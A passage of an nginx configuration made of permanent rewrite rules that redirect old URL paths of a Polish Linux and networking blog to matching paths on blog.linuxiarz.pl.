^/972/instalacja-vestacp-panel-administracyny/$ https://blog.linuxiarz.pl/972/instalacja-vestacp-panel-administracyny/ permanent; +rewrite ^/985/reaktywacja-unitra-eu-org/$ https://blog.linuxiarz.pl/985/reaktywacja-unitra-eu-org/ permanent; +rewrite ^/988/migracja-z-serwera-mysql-na-mariadb/$ https://blog.linuxiarz.pl/988/migracja-z-serwera-mysql-na-mariadb/ permanent; +rewrite ^/998/lighttpd-php5-mariadb-phpmyadmin-lpmp/$ https://blog.linuxiarz.pl/998/lighttpd-php5-mariadb-phpmyadmin-lpmp/ permanent; +rewrite ^/1010/serwer-ts3-z-baza-danych-mariadb-phpmyadmin-na-ubuntu-14-04-lts/$ https://blog.linuxiarz.pl/1010/serwer-ts3-z-baza-danych-mariadb-phpmyadmin-na-ubuntu-14-04-lts/ permanent; +rewrite ^/1066/netxms-system-monitoringu-sieciowego/$ https://blog.linuxiarz.pl/1066/netxms-system-monitoringu-sieciowego/ permanent; +rewrite ^/1095/import-bazy-danych-mysql-z-konsoli/$ https://blog.linuxiarz.pl/1095/import-bazy-danych-mysql-z-konsoli/ permanent; +rewrite ^/1059/szybka-instalacja-skryptu-phpsysinfo/$ https://blog.linuxiarz.pl/1059/szybka-instalacja-skryptu-phpsysinfo/ permanent; +rewrite ^/1040/instalacja-panelu-ispconfig3-na-systemie-ubuntu-14-04-lts/$ https://blog.linuxiarz.pl/1040/instalacja-panelu-ispconfig3-na-systemie-ubuntu-14-04-lts/ permanent; +rewrite ^/994/instalacja-lighttpd-php5-na/$ https://blog.linuxiarz.pl/994/instalacja-lighttpd-php5-na/ permanent; +rewrite ^/802/apache-2-4-9-problemy-z-htaccess-i-permalink-w-wordpress/$ https://blog.linuxiarz.pl/802/apache-2-4-9-problemy-z-htaccess-i-permalink-w-wordpress/ permanent; +rewrite ^/816/parkowanie-domeny-na-vps-z-uzyciem-bind/$ https://blog.linuxiarz.pl/816/parkowanie-domeny-na-vps-z-uzyciem-bind/ permanent; +rewrite ^/837/zdalne-polaczenie-z-baza-mysql/$ https://blog.linuxiarz.pl/837/zdalne-polaczenie-z-baza-mysql/ permanent; +rewrite ^/843/zmiana-nazwy-hosta-w-monitoringu-munin-change-munin-hostname/$ https://blog.linuxiarz.pl/843/zmiana-nazwy-hosta-w-monitoringu-munin-change-munin-hostname/ permanent; +rewrite ^/849/apache-i-tworzenie-virtualhostow/$ https://blog.linuxiarz.pl/849/apache-i-tworzenie-virtualhostow/ permanent; +rewrite ^/859/nowy-domowy-router-mikrotik-rb951g-2hnd/$ https://blog.linuxiarz.pl/859/nowy-domowy-router-mikrotik-rb951g-2hnd/ permanent; +rewrite ^/869/witamy-wsrod-zywych-serwer-team-speak-3-online/$ https://blog.linuxiarz.pl/869/witamy-wsrod-zywych-serwer-team-speak-3-online/ permanent; +rewrite ^/885/narzedzie-fping-jako-alternatywa-dla-ping/$ https://blog.linuxiarz.pl/885/narzedzie-fping-jako-alternatywa-dla-ping/ permanent; +rewrite ^/899/iptables-blokowanie-ip-z-chin/$ https://blog.linuxiarz.pl/899/iptables-blokowanie-ip-z-chin/ permanent; +rewrite ^/865/awaria-serwera-teamspeak3/$ https://blog.linuxiarz.pl/865/awaria-serwera-teamspeak3/ permanent; +rewrite ^/199/kompilujemy-transmission-na-linuxie/$ https://blog.linuxiarz.pl/199/kompilujemy-transmission-na-linuxie/ permanent; +rewrite ^/352/webui-aria2-czyli-kolejny-interfejs-graficzny-do-aria2/$ https://blog.linuxiarz.pl/352/webui-aria2-czyli-kolejny-interfejs-graficzny-do-aria2/ permanent; +rewrite ^/478/adblock-w-gargoyle-blokowanie-reklam-na-routerze/$ https://blog.linuxiarz.pl/478/adblock-w-gargoyle-blokowanie-reklam-na-routerze/ permanent; +rewrite ^/504/bootowalny-dysk-usb-w-linuxie/$ https://blog.linuxiarz.pl/504/bootowalny-dysk-usb-w-linuxie/ permanent; +rewrite ^/822/routeros-v6-16-wydany/$ https://blog.linuxiarz.pl/822/routeros-v6-16-wydany/ permanent; +rewrite ^/810/routeros-6-16rc15-2014-jul-08-1045/$ https://blog.linuxiarz.pl/810/routeros-6-16rc15-2014-jul-08-1045/ permanent; +rewrite ^/797/glos-tomasza-knapika-automapa/$ https://blog.linuxiarz.pl/797/glos-tomasza-knapika-automapa/ permanent; +rewrite ^/789/mikrotik-serwer-pptp/$ https://blog.linuxiarz.pl/789/mikrotik-serwer-pptp/ permanent; +rewrite ^/784/dd-wrt-i-ustawianie-routera-w-tryb-ap-bridge/$ https://blog.linuxiarz.pl/784/dd-wrt-i-ustawianie-routera-w-tryb-ap-bridge/ permanent; +rewrite ^/781/aktualizacja-mikrotika-z-konsoli/$ https://blog.linuxiarz.pl/781/aktualizacja-mikrotika-z-konsoli/ permanent; +rewrite ^/777/ts3-linuxiarz-pl-bot-muzyczny/$ https://blog.linuxiarz.pl/777/ts3-linuxiarz-pl-bot-muzyczny/ permanent; +rewrite ^/764/stawianie-serwera-team-speak-3-baza-mysql/$ https://blog.linuxiarz.pl/764/stawianie-serwera-team-speak-3-baza-mysql/ permanent; +rewrite ^/759/teamspeak-3-instalacja-licencji-i-aktualizacja/$ https://blog.linuxiarz.pl/759/teamspeak-3-instalacja-licencji-i-aktualizacja/ permanent; +rewrite ^/755/zmiany-zmiany/$ https://blog.linuxiarz.pl/755/zmiany-zmiany/ permanent; +rewrite ^/706/hackowanie-lamanie-hasla-windows-xp/$ https://blog.linuxiarz.pl/706/hackowanie-lamanie-hasla-windows-xp/ permanent; +rewrite ^/729/droopy-prosty-upload-plikow-w-pythonie/$ https://blog.linuxiarz.pl/729/droopy-prosty-upload-plikow-w-pythonie/ permanent; +rewrite ^/601/digitemp-i-zapis-do-mysql/$ https://blog.linuxiarz.pl/601/digitemp-i-zapis-do-mysql/ permanent; +rewrite ^/742/ataki-na-bloga/$ https://blog.linuxiarz.pl/742/ataki-na-bloga/ permanent; +rewrite ^/740/aktualizacja-obrazow-openwrt/$ https://blog.linuxiarz.pl/740/aktualizacja-obrazow-openwrt/ permanent; +rewrite ^/736/google-cloud-print-skrypt-startowy/$ https://blog.linuxiarz.pl/736/google-cloud-print-skrypt-startowy/ permanent; +rewrite ^/733/video_tdr_failure-w-windowsie-8-1-rozwiazanie/$ https://blog.linuxiarz.pl/733/video_tdr_failure-w-windowsie-8-1-rozwiazanie/ permanent; +rewrite ^/718/aktualizacja-xbmc-na-ubuntu-12-04-do-wersji-xbmc-13-gotham/$ https://blog.linuxiarz.pl/718/aktualizacja-xbmc-na-ubuntu-12-04-do-wersji-xbmc-13-gotham/ permanent; +rewrite ^/716/nowy-nabytek-laptop/$ https://blog.linuxiarz.pl/716/nowy-nabytek-laptop/ permanent; +rewrite ^/701/aktualizacja-tvheadend/$ https://blog.linuxiarz.pl/701/aktualizacja-tvheadend/ permanent; +rewrite ^/679/montaz-alpine-cde-111r-i-subwoofera-do-nissana-primera-p11-144/$ https://blog.linuxiarz.pl/679/montaz-alpine-cde-111r-i-subwoofera-do-nissana-primera-p11-144/ permanent; +rewrite ^/664/chieftec-bt-02b-sfx180w-moja-nowa-obudowa/$ https://blog.linuxiarz.pl/664/chieftec-bt-02b-sfx180w-moja-nowa-obudowa/ permanent; +rewrite ^/661/pozbywanie-sie-starych-kerneli-w-debianie/$ https://blog.linuxiarz.pl/661/pozbywanie-sie-starych-kerneli-w-debianie/ permanent; +rewrite ^/659/najnowsze-14-02-2014-openwrt/$ https://blog.linuxiarz.pl/659/najnowsze-14-02-2014-openwrt/ permanent; +rewrite ^/654/karta-gigabit-ethernet-tp-link-tg-3269/$ https://blog.linuxiarz.pl/654/karta-gigabit-ethernet-tp-link-tg-3269/ permanent; +rewrite ^/649/temperatura-gniezno-pl/$ https://blog.linuxiarz.pl/649/temperatura-gniezno-pl/ permanent; +rewrite ^/641/lm-sensors-i-plyta-glowna-ad2550b-itx/$ https://blog.linuxiarz.pl/641/lm-sensors-i-plyta-glowna-ad2550b-itx/ permanent; +rewrite ^/636/problemy-z-firmware-na-debian-8-jessie/$ https://blog.linuxiarz.pl/636/problemy-z-firmware-na-debian-8-jessie/ permanent; +rewrite ^/631/google-cloud-print-w-linuksie/$ https://blog.linuxiarz.pl/631/google-cloud-print-w-linuksie/ permanent; +rewrite ^/629/galeria-screenshotow-z-openwrt/$ https://blog.linuxiarz.pl/629/galeria-screenshotow-z-openwrt/ permanent; +rewrite ^/627/nowa-wersja-obrazow-openwrt-r39288/$ https://blog.linuxiarz.pl/627/nowa-wersja-obrazow-openwrt-r39288/ permanent; +rewrite ^/619/openwrt-trunk/$ https://blog.linuxiarz.pl/619/openwrt-trunk/ permanent; +rewrite ^/610/instalacja-serwera-lamp-apache-php-mysql/$ https://blog.linuxiarz.pl/610/instalacja-serwera-lamp-apache-php-mysql/ permanent; +rewrite ^/501/nowy-serwer-domowy/$ https://blog.linuxiarz.pl/501/nowy-serwer-domowy/ permanent; +rewrite ^/590/pinta-czyli-paint-w-linuxie/$ https://blog.linuxiarz.pl/590/pinta-czyli-paint-w-linuxie/ permanent; +rewrite ^/557/server-ftp-na-debianie-vsftp-ssl-pub/$ https://blog.linuxiarz.pl/557/server-ftp-na-debianie-vsftp-ssl-pub/ permanent; +rewrite ^/151/minidlna-czyli-filmy-muzyka-i-zdjecia-w-otoczeniu-sieciowym/$ https://blog.linuxiarz.pl/151/minidlna-czyli-filmy-muzyka-i-zdjecia-w-otoczeniu-sieciowym/ permanent; +rewrite ^/552/tp-link-tl-wr1043nd-v2-i-wsparcie-openwrt-aa-gargoylepl/$ https://blog.linuxiarz.pl/552/tp-link-tl-wr1043nd-v2-i-wsparcie-openwrt-aa-gargoylepl/ permanent; +rewrite ^/543/nowy-linux/$ https://blog.linuxiarz.pl/543/nowy-linux/ permanent; +rewrite ^/532/montowanie-zasobow-cifs-samba/$ https://blog.linuxiarz.pl/532/montowanie-zasobow-cifs-samba/ permanent; +rewrite ^/525/najnowsze-xbmc-w-debianie/$ https://blog.linuxiarz.pl/525/najnowsze-xbmc-w-debianie/ permanent; +rewrite ^/522/gargoyle-problemy-z-gui/$ https://blog.linuxiarz.pl/522/gargoyle-problemy-z-gui/ permanent; +rewrite ^/511/seagate-st3000dm001-3tb-na-miejscu/$ https://blog.linuxiarz.pl/511/seagate-st3000dm001-3tb-na-miejscu/ permanent; +rewrite ^/486/tornado-web-server-minihowto/$ https://blog.linuxiarz.pl/486/tornado-web-server-minihowto/ permanent; +rewrite ^/482/uwaga-oszusci-na-facebooku-i-innych/$ https://blog.linuxiarz.pl/482/uwaga-oszusci-na-facebooku-i-innych/ permanent; +rewrite ^/474/multiwan-w-openwrt/$ https://blog.linuxiarz.pl/474/multiwan-w-openwrt/ permanent; +rewrite ^/467/przegladarka-opera-w-systemach-linux-i-innych/$ https://blog.linuxiarz.pl/467/przegladarka-opera-w-systemach-linux-i-innych/ permanent; +rewrite ^/450/plex-kombajn-multimedialny-na-domowym-serwerze/$ https://blog.linuxiarz.pl/450/plex-kombajn-multimedialny-na-domowym-serwerze/ permanent; +rewrite ^/447/nowy-hosting-osiagi/$ https://blog.linuxiarz.pl/447/nowy-hosting-osiagi/ permanent; +rewrite ^/444/dwa-nowe-albumy-w-galerii-zdjec/$ https://blog.linuxiarz.pl/444/dwa-nowe-albumy-w-galerii-zdjec/ permanent; +rewrite ^/435/nowy-hosting/$ https://blog.linuxiarz.pl/435/nowy-hosting/ permanent; +rewrite ^/430/directory-listing-czyli-co-mamy-w-katalogu-www-na-przykladzie-lighttpd/$ https://blog.linuxiarz.pl/430/directory-listing-czyli-co-mamy-w-katalogu-www-na-przykladzie-lighttpd/ permanent; +rewrite ^/184/klint-deluge-na-twojego-seedboxa/$ https://blog.linuxiarz.pl/184/klint-deluge-na-twojego-seedboxa/ permanent; +rewrite ^/217/transmission-control-nowe-gui-dla-transmission/$ https://blog.linuxiarz.pl/217/transmission-control-nowe-gui-dla-transmission/ permanent; +rewrite ^/320/phpsysinfo-lighttpd-na-linuxie/$ https://blog.linuxiarz.pl/320/phpsysinfo-lighttpd-na-linuxie/ permanent; +rewrite ^/332/kompilacja-tvheadend-na-linuxie/$ https://blog.linuxiarz.pl/332/kompilacja-tvheadend-na-linuxie/ permanent; +rewrite ^/358/instalacja-krok-po-kroku-pyload-na-linuxie/$ https://blog.linuxiarz.pl/358/instalacja-krok-po-kroku-pyload-na-linuxie/ permanent; +rewrite ^/378/serwer-oraz-klient-nfs-konfiguracja-w-linuxie/$ https://blog.linuxiarz.pl/378/serwer-oraz-klient-nfs-konfiguracja-w-linuxie/ permanent; +rewrite ^/380/speedtest-net-w-konsoli/$ https://blog.linuxiarz.pl/380/speedtest-net-w-konsoli/ permanent; +rewrite ^/8/serwer-teamspeak-3/$ https://blog.linuxiarz.pl/8/serwer-teamspeak-3/ permanent; +rewrite ^/369/aplikacja-4-psiandroid-monitor-phpsysinfo-w-androidzie/$ https://blog.linuxiarz.pl/369/aplikacja-4-psiandroid-monitor-phpsysinfo-w-androidzie/ permanent; +rewrite ^/271/witam-po-przerwie/$ https://blog.linuxiarz.pl/271/witam-po-przerwie/ permanent; +rewrite ^/274/aplikacja-3-ds-battery-saver/$ https://blog.linuxiarz.pl/274/aplikacja-3-ds-battery-saver/ permanent; +rewrite ^/265/kilka-informacji/$ https://blog.linuxiarz.pl/265/kilka-informacji/ permanent; +rewrite ^/242/brak-wpisow-dzialalnosc-zatrzymana/$ https://blog.linuxiarz.pl/242/brak-wpisow-dzialalnosc-zatrzymana/ permanent; +rewrite ^/225/usuwanie-linuxa-bez-naruszenia-windowsa/$ https://blog.linuxiarz.pl/225/usuwanie-linuxa-bez-naruszenia-windowsa/ permanent; +rewrite ^/238/aplikacja-2-flightradar24-pro/$ https://blog.linuxiarz.pl/238/aplikacja-2-flightradar24-pro/ permanent; +rewrite ^/233/gargoyle-1-5-10-6-i-nowy-plugin/$ https://blog.linuxiarz.pl/233/gargoyle-1-5-10-6-i-nowy-plugin/ permanent; +rewrite ^/6/pierwszy-wpis-powitanie/$ https://blog.linuxiarz.pl/6/pierwszy-wpis-powitanie/ permanent; +rewrite ^/194/darmowy-internet-w-polsce-aero2/$ https://blog.linuxiarz.pl/194/darmowy-internet-w-polsce-aero2/ permanent; +rewrite ^/182/gargoyle-pl-aktualizacja-1-5-10-5/$ https://blog.linuxiarz.pl/182/gargoyle-pl-aktualizacja-1-5-10-5/ permanent; +rewrite ^/171/chinska-podrobka-samsung-galaxy-s-iii/$ https://blog.linuxiarz.pl/171/chinska-podrobka-samsung-galaxy-s-iii/ permanent; +rewrite ^/128/ipla-tvn-player-i-inne-za-darmo-bez-reklam/$ https://blog.linuxiarz.pl/128/ipla-tvn-player-i-inne-za-darmo-bez-reklam/ permanent; +rewrite ^/37/37/$ https://blog.linuxiarz.pl/37/37/ permanent; +rewrite ^/53/telewizja-hybrydowa-co-i-jak/$ https://blog.linuxiarz.pl/53/telewizja-hybrydowa-co-i-jak/ permanent; +rewrite ^/kontakt/$ https://blog.linuxiarz.pl/kontakt/ permanent; +rewrite ^/serwer-teamspeak-3/$ https://blog.linuxiarz.pl/serwer-teamspeak-3/ permanent; +rewrite ^/aktualna-temperatura-gniezno/$ https://blog.linuxiarz.pl/aktualna-temperatura-gniezno/ permanent; +rewrite ^/co-to-sa-pliki-cookies-i-jakie-sa-tutaj-wykorzystane/$ https://blog.linuxiarz.pl/co-to-sa-pliki-cookies-i-jakie-sa-tutaj-wykorzystane/ permanent; +rewrite ^/2323/sofarsolar-ktl-x-home-assistant-monitoring-twojej-fotowoltaiki/esp32usofar/$ https://blog.linuxiarz.pl/2323/sofarsolar-ktl-x-home-assistant-monitoring-twojej-fotowoltaiki/esp32usofar/ permanent; +rewrite ^/2323/sofarsolar-ktl-x-home-assistant-monitoring-twojej-fotowoltaiki/ems32_u_sofar2/$ https://blog.linuxiarz.pl/2323/sofarsolar-ktl-x-home-assistant-monitoring-twojej-fotowoltaiki/ems32_u_sofar2/ permanent; +rewrite ^/2323/sofarsolar-ktl-x-home-assistant-monitoring-twojej-fotowoltaiki/ems32_u_sofar3/$ https://blog.linuxiarz.pl/2323/sofarsolar-ktl-x-home-assistant-monitoring-twojej-fotowoltaiki/ems32_u_sofar3/ permanent; +rewrite ^/2323/sofarsolar-ktl-x-home-assistant-monitoring-twojej-fotowoltaiki/ems32_u_sofar1/$ https://blog.linuxiarz.pl/2323/sofarsolar-ktl-x-home-assistant-monitoring-twojej-fotowoltaiki/ems32_u_sofar1/ permanent; +rewrite ^/2354/sofarsolar-ktl-x-i-logger-lsw-3-lse-3-grafana-influxdb/zrzut-ekranu-z-2022-07-09-21-25-33/$ https://blog.linuxiarz.pl/2354/sofarsolar-ktl-x-i-logger-lsw-3-lse-3-grafana-influxdb/zrzut-ekranu-z-2022-07-09-21-25-33/ permanent; +rewrite ^/2354/sofarsolar-ktl-x-i-logger-lsw-3-lse-3-grafana-influxdb/zrzut-ekranu-z-2022-07-09-21-09-02/$ https://blog.linuxiarz.pl/2354/sofarsolar-ktl-x-i-logger-lsw-3-lse-3-grafana-influxdb/zrzut-ekranu-z-2022-07-09-21-09-02/ permanent; +rewrite ^/2323/sofarsolar-ktl-x-home-assistant-monitoring-twojej-fotowoltaiki/20220706_145232/$ https://blog.linuxiarz.pl/2323/sofarsolar-ktl-x-home-assistant-monitoring-twojej-fotowoltaiki/20220706_145232/ permanent; +rewrite ^/2323/sofarsolar-ktl-x-home-assistant-monitoring-twojej-fotowoltaiki/20220225_163443/$ https://blog.linuxiarz.pl/2323/sofarsolar-ktl-x-home-assistant-monitoring-twojej-fotowoltaiki/20220225_163443/ permanent; +rewrite ^/2323/sofarsolar-ktl-x-home-assistant-monitoring-twojej-fotowoltaiki/20220225_163425/$ https://blog.linuxiarz.pl/2323/sofarsolar-ktl-x-home-assistant-monitoring-twojej-fotowoltaiki/20220225_163425/ permanent; +rewrite ^/2323/sofarsolar-ktl-x-home-assistant-monitoring-twojej-fotowoltaiki/zrzut-ekranu-z-2022-07-06-14-43-16/$ https://blog.linuxiarz.pl/2323/sofarsolar-ktl-x-home-assistant-monitoring-twojej-fotowoltaiki/zrzut-ekranu-z-2022-07-06-14-43-16/ permanent; +rewrite ^/2323/sofarsolar-ktl-x-home-assistant-monitoring-twojej-fotowoltaiki/zrzut-ekranu-z-2022-07-06-14-43-44/$ https://blog.linuxiarz.pl/2323/sofarsolar-ktl-x-home-assistant-monitoring-twojej-fotowoltaiki/zrzut-ekranu-z-2022-07-06-14-43-44/ permanent; +rewrite ^/2323/sofarsolar-ktl-x-home-assistant-monitoring-twojej-fotowoltaiki/zrzut-ekranu-z-2022-07-06-14-38-54/$ https://blog.linuxiarz.pl/2323/sofarsolar-ktl-x-home-assistant-monitoring-twojej-fotowoltaiki/zrzut-ekranu-z-2022-07-06-14-38-54/ permanent; +rewrite ^/2323/sofarsolar-ktl-x-home-assistant-monitoring-twojej-fotowoltaiki/zrzut-ekranu-z-2022-07-06-14-39-07/$ https://blog.linuxiarz.pl/2323/sofarsolar-ktl-x-home-assistant-monitoring-twojej-fotowoltaiki/zrzut-ekranu-z-2022-07-06-14-39-07/ permanent; +rewrite ^/2323/sofarsolar-ktl-x-home-assistant-monitoring-twojej-fotowoltaiki/zrzut-ekranu-z-2022-07-06-14-34-47/$ https://blog.linuxiarz.pl/2323/sofarsolar-ktl-x-home-assistant-monitoring-twojej-fotowoltaiki/zrzut-ekranu-z-2022-07-06-14-34-47/ permanent; +rewrite ^/2323/sofarsolar-ktl-x-home-assistant-monitoring-twojej-fotowoltaiki/sofar-solar-rs485/$ https://blog.linuxiarz.pl/2323/sofarsolar-ktl-x-home-assistant-monitoring-twojej-fotowoltaiki/sofar-solar-rs485/ permanent; +rewrite ^/2263/przywracanie-hasla-do-kontrolera-unifi/unifi_pass/$ https://blog.linuxiarz.pl/2263/przywracanie-hasla-do-kontrolera-unifi/unifi_pass/ permanent; +rewrite ^/2253/zalatany-apache-warto-zrobic-update/apache-2/$ https://blog.linuxiarz.pl/2253/zalatany-apache-warto-zrobic-update/apache-2/ permanent; +rewrite ^/2197/ovh-publiccloud-instalacja-proxmox-5-debian-9-stretch/pci4/$ https://blog.linuxiarz.pl/2197/ovh-publiccloud-instalacja-proxmox-5-debian-9-stretch/pci4/ permanent; +rewrite ^/2197/ovh-publiccloud-instalacja-proxmox-5-debian-9-stretch/pci3/$ https://blog.linuxiarz.pl/2197/ovh-publiccloud-instalacja-proxmox-5-debian-9-stretch/pci3/ permanent; +rewrite ^/2197/ovh-publiccloud-instalacja-proxmox-5-debian-9-stretch/pci12/$ https://blog.linuxiarz.pl/2197/ovh-publiccloud-instalacja-proxmox-5-debian-9-stretch/pci12/ permanent; +rewrite ^/2197/ovh-publiccloud-instalacja-proxmox-5-debian-9-stretch/pci11/$ https://blog.linuxiarz.pl/2197/ovh-publiccloud-instalacja-proxmox-5-debian-9-stretch/pci11/ permanent; +rewrite ^/2197/ovh-publiccloud-instalacja-proxmox-5-debian-9-stretch/pci10/$ https://blog.linuxiarz.pl/2197/ovh-publiccloud-instalacja-proxmox-5-debian-9-stretch/pci10/ permanent; +rewrite ^/2197/ovh-publiccloud-instalacja-proxmox-5-debian-9-stretch/pci9/$ https://blog.linuxiarz.pl/2197/ovh-publiccloud-instalacja-proxmox-5-debian-9-stretch/pci9/ permanent; +rewrite ^/2197/ovh-publiccloud-instalacja-proxmox-5-debian-9-stretch/pci8/$ https://blog.linuxiarz.pl/2197/ovh-publiccloud-instalacja-proxmox-5-debian-9-stretch/pci8/ permanent; +rewrite ^/2197/ovh-publiccloud-instalacja-proxmox-5-debian-9-stretch/pci7/$ https://blog.linuxiarz.pl/2197/ovh-publiccloud-instalacja-proxmox-5-debian-9-stretch/pci7/ permanent; +rewrite ^/2197/ovh-publiccloud-instalacja-proxmox-5-debian-9-stretch/pci6/$ https://blog.linuxiarz.pl/2197/ovh-publiccloud-instalacja-proxmox-5-debian-9-stretch/pci6/ permanent; +rewrite ^/2197/ovh-publiccloud-instalacja-proxmox-5-debian-9-stretch/pci5/$ https://blog.linuxiarz.pl/2197/ovh-publiccloud-instalacja-proxmox-5-debian-9-stretch/pci5/ permanent; +rewrite ^/2197/ovh-publiccloud-instalacja-proxmox-5-debian-9-stretch/pci2/$ https://blog.linuxiarz.pl/2197/ovh-publiccloud-instalacja-proxmox-5-debian-9-stretch/pci2/ permanent; +rewrite ^/2197/ovh-publiccloud-instalacja-proxmox-5-debian-9-stretch/pci-1/$ https://blog.linuxiarz.pl/2197/ovh-publiccloud-instalacja-proxmox-5-debian-9-stretch/pci-1/ permanent; +rewrite ^/2197/ovh-publiccloud-instalacja-proxmox-5-debian-9-stretch/pci_prox/$ https://blog.linuxiarz.pl/2197/ovh-publiccloud-instalacja-proxmox-5-debian-9-stretch/pci_prox/ permanent; +rewrite ^/2172/vmware-esxi-6-0-monitoring-zabbixem/zabbixvmw/$ https://blog.linuxiarz.pl/2172/vmware-esxi-6-0-monitoring-zabbixem/zabbixvmw/ permanent; +rewrite ^/2172/vmware-esxi-6-0-monitoring-zabbixem/zbx6/$ https://blog.linuxiarz.pl/2172/vmware-esxi-6-0-monitoring-zabbixem/zbx6/ permanent; +rewrite ^/2172/vmware-esxi-6-0-monitoring-zabbixem/zbx5/$ https://blog.linuxiarz.pl/2172/vmware-esxi-6-0-monitoring-zabbixem/zbx5/ permanent; +rewrite ^/2172/vmware-esxi-6-0-monitoring-zabbixem/zbx4/$ https://blog.linuxiarz.pl/2172/vmware-esxi-6-0-monitoring-zabbixem/zbx4/ permanent; +rewrite ^/2172/vmware-esxi-6-0-monitoring-zabbixem/zbx3/$ https://blog.linuxiarz.pl/2172/vmware-esxi-6-0-monitoring-zabbixem/zbx3/ permanent; +rewrite ^/2172/vmware-esxi-6-0-monitoring-zabbixem/zbx2/$ https://blog.linuxiarz.pl/2172/vmware-esxi-6-0-monitoring-zabbixem/zbx2/ permanent; +rewrite ^/2172/vmware-esxi-6-0-monitoring-zabbixem/zbx1/$ https://blog.linuxiarz.pl/2172/vmware-esxi-6-0-monitoring-zabbixem/zbx1/ permanent; +rewrite ^/2172/vmware-esxi-6-0-monitoring-zabbixem/snmp2/$ https://blog.linuxiarz.pl/2172/vmware-esxi-6-0-monitoring-zabbixem/snmp2/ permanent; +rewrite ^/2172/vmware-esxi-6-0-monitoring-zabbixem/snmp1/$ https://blog.linuxiarz.pl/2172/vmware-esxi-6-0-monitoring-zabbixem/snmp1/ permanent; +rewrite ^/2149/nginx-z-http2-oraz-spdy-jednoczesnie-to-mozliwe/http1-2-back/$ https://blog.linuxiarz.pl/2149/nginx-z-http2-oraz-spdy-jednoczesnie-to-mozliwe/http1-2-back/ permanent; +rewrite ^/2149/nginx-z-http2-oraz-spdy-jednoczesnie-to-mozliwe/http2-27/$ https://blog.linuxiarz.pl/2149/nginx-z-http2-oraz-spdy-jednoczesnie-to-mozliwe/http2-27/ permanent; +rewrite ^/2149/nginx-z-http2-oraz-spdy-jednoczesnie-to-mozliwe/http_21/$ https://blog.linuxiarz.pl/2149/nginx-z-http2-oraz-spdy-jednoczesnie-to-mozliwe/http_21/ permanent; +rewrite ^/2149/nginx-z-http2-oraz-spdy-jednoczesnie-to-mozliwe/cf1/$ https://blog.linuxiarz.pl/2149/nginx-z-http2-oraz-spdy-jednoczesnie-to-mozliwe/cf1/ permanent; +rewrite ^/2131/nginx-1-10-0-stable-i-nginx-1-11-0-mainline/nginx-logo-2/$ https://blog.linuxiarz.pl/2131/nginx-1-10-0-stable-i-nginx-1-11-0-mainline/nginx-logo-2/ permanent; +rewrite ^/2066/certyfikat-ssl-z-letsencrypt-i-autoodnawianie/letsencrypt-free-ssl-for-all/$ https://blog.linuxiarz.pl/2066/certyfikat-ssl-z-letsencrypt-i-autoodnawianie/letsencrypt-free-ssl-for-all/ permanent; +rewrite ^/2106/wordpress-na-ubuntu-16-04-nginx-php7-ftp-z-ssl/ub16-logo-maria-php-le/$ https://blog.linuxiarz.pl/2106/wordpress-na-ubuntu-16-04-nginx-php7-ftp-z-ssl/ub16-logo-maria-php-le/ permanent; +rewrite ^/2106/wordpress-na-ubuntu-16-04-nginx-php7-ftp-z-ssl/perf2/$ https://blog.linuxiarz.pl/2106/wordpress-na-ubuntu-16-04-nginx-php7-ftp-z-ssl/perf2/ permanent; +rewrite ^/2106/wordpress-na-ubuntu-16-04-nginx-php7-ftp-z-ssl/perf1/$ https://blog.linuxiarz.pl/2106/wordpress-na-ubuntu-16-04-nginx-php7-ftp-z-ssl/perf1/ permanent; +rewrite ^/2106/wordpress-na-ubuntu-16-04-nginx-php7-ftp-z-ssl/ub16-wp-rdy/$ https://blog.linuxiarz.pl/2106/wordpress-na-ubuntu-16-04-nginx-php7-ftp-z-ssl/ub16-wp-rdy/ permanent; +rewrite ^/2106/wordpress-na-ubuntu-16-04-nginx-php7-ftp-z-ssl/ub16_ssl-wp/$ https://blog.linuxiarz.pl/2106/wordpress-na-ubuntu-16-04-nginx-php7-ftp-z-ssl/ub16_ssl-wp/ permanent; +rewrite ^/2106/wordpress-na-ubuntu-16-04-nginx-php7-ftp-z-ssl/pma_ub16_3/$ https://blog.linuxiarz.pl/2106/wordpress-na-ubuntu-16-04-nginx-php7-ftp-z-ssl/pma_ub16_3/ permanent; +rewrite ^/2106/wordpress-na-ubuntu-16-04-nginx-php7-ftp-z-ssl/pma_ub16_2/$ https://blog.linuxiarz.pl/2106/wordpress-na-ubuntu-16-04-nginx-php7-ftp-z-ssl/pma_ub16_2/ permanent; +rewrite ^/2106/wordpress-na-ubuntu-16-04-nginx-php7-ftp-z-ssl/pma_ub16_1/$ https://blog.linuxiarz.pl/2106/wordpress-na-ubuntu-16-04-nginx-php7-ftp-z-ssl/pma_ub16_1/ permanent; +rewrite ^/2106/wordpress-na-ubuntu-16-04-nginx-php7-ftp-z-ssl/create/$ https://blog.linuxiarz.pl/2106/wordpress-na-ubuntu-16-04-nginx-php7-ftp-z-ssl/create/ permanent; +rewrite ^/300/termometr-ds1820/termo/$ https://blog.linuxiarz.pl/300/termometr-ds1820/termo/ permanent; +rewrite ^/300/termometr-ds1820/ds18b20-logtemp-th/$ https://blog.linuxiarz.pl/300/termometr-ds1820/ds18b20-logtemp-th/ permanent; +rewrite ^/2082/lemp-na-ubuntu-16-04-nginx-mariadb-php7-memcache/install-lemp-on-ubuntu/$ https://blog.linuxiarz.pl/2082/lemp-na-ubuntu-16-04-nginx-mariadb-php7-memcache/install-lemp-on-ubuntu/ permanent; +rewrite ^/2066/certyfikat-ssl-z-letsencrypt-i-autoodnawianie/lets-sponsor/$ https://blog.linuxiarz.pl/2066/certyfikat-ssl-z-letsencrypt-i-autoodnawianie/lets-sponsor/ permanent; +rewrite ^/2066/certyfikat-ssl-z-letsencrypt-i-autoodnawianie/lets-encrypt/$ https://blog.linuxiarz.pl/2066/certyfikat-ssl-z-letsencrypt-i-autoodnawianie/lets-encrypt/ permanent; +rewrite ^/2053/instalacja-serwera-teamspeak3-bot-muzyczny-baza-mysql-debian-8-ubuntu-14-04-ubuntu-16-04/reg/$ https://blog.linuxiarz.pl/2053/instalacja-serwera-teamspeak3-bot-muzyczny-baza-mysql-debian-8-ubuntu-14-04-ubuntu-16-04/reg/ permanent; +rewrite ^/2053/instalacja-serwera-teamspeak3-bot-muzyczny-baza-mysql-debian-8-ubuntu-14-04-ubuntu-16-04/2016-04-16-14_45_35-sinusbot-yandex/$ https://blog.linuxiarz.pl/2053/instalacja-serwera-teamspeak3-bot-muzyczny-baza-mysql-debian-8-ubuntu-14-04-ubuntu-16-04/2016-04-16-14_45_35-sinusbot-yandex/ permanent; +rewrite 